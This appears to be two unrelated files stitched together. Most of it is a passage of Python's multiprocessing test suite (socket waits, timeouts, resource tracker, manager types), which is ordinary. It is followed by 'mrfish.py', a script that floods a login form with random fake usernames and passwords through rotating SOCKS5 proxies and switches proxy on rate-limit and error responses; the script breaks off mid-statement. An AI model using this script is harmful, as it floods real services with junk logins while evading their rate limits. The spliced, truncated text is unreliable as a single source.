self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
mrfish.py
|
import requests
import os
import random
import string
import json
import threading
from requests.exceptions import SSLError
from datetime import datetime
def generate_random_name():
event = random.randint(0, 4)
if event == 0:
return str(random.choice(names)).lower()
elif event in [1, 2]:
separator = ['-', '.', '_']
return str(random.choice(names)).lower() + separator[random.randint(0, len(separator) - 1)] + str(
random.choice(names)).lower()
else:
return str(random.choice(names)).lower() + random.choice(string.digits) + random.choice(string.digits)
def generate_random_password():
event = random.randint(0, 6)
if event == 0:
return ''.join(random.choice(chars) for i in range(random.randint(7, 15)))
elif event in [1, 2]:
return random.choice(dictionary) + random.choice(dictionary) + random.choice(string.digits)
elif event in [3, 4]:
return random.choice(dictionary) + random.choice(string.digits)
else:
return random.choice(string.digits) + random.choice(dictionary) + random.choice(names)
def run():
proxy = None
while True:
if use_proxy == 'y':
proxy = f'socks5://{random.choice(proxy_list)}'
if formDataNameLoginName == 'u':
username = generate_random_name()
if formDataNameLoginName == 'e':
username = generate_random_name() + '@' + random.choice(emails) + \
'.' + random.choice(ext)
password = generate_random_password()
try:
r = requests.post(url, headers=headers, allow_redirects=False, data={
str(formDataNameCookie): str(headers['Cookie']),
str(formDataNameContentType): str(headers['Content-Type']),
str(formDataNameLogin): username,
str(formDataNamePass): password,
}, proxies=dict(http=proxy, https=proxy))
date = datetime.today().strftime('%H:%m:%S')
if r.status_code == 403 or r.status_code == 429 or r.status_code == 500 or r.status_code == 502 or r.status_code == 503 or r.status_code == 504:
print(f'[{date}] {r.status_code} {r.reason} {r.url}')
proxy = f'socks5://{random.choice(proxy_list)}'
if r.status_code == 429:
print(f'[{date}] {username}:{password} - {r.status_code}; You are being rate limited!')
continue
print(
f'{date}> [Result: {r.status_code}] - [{formDataNameLogin}: {username}] - [{formDataNamePass}: {password}] [Proxy: {proxy}]')
except SSLError as e:
proxy = f'socks5://{random.choice(proxy_list)}'
# print('Error: URL can no longer be reached..')
except Exception as e:
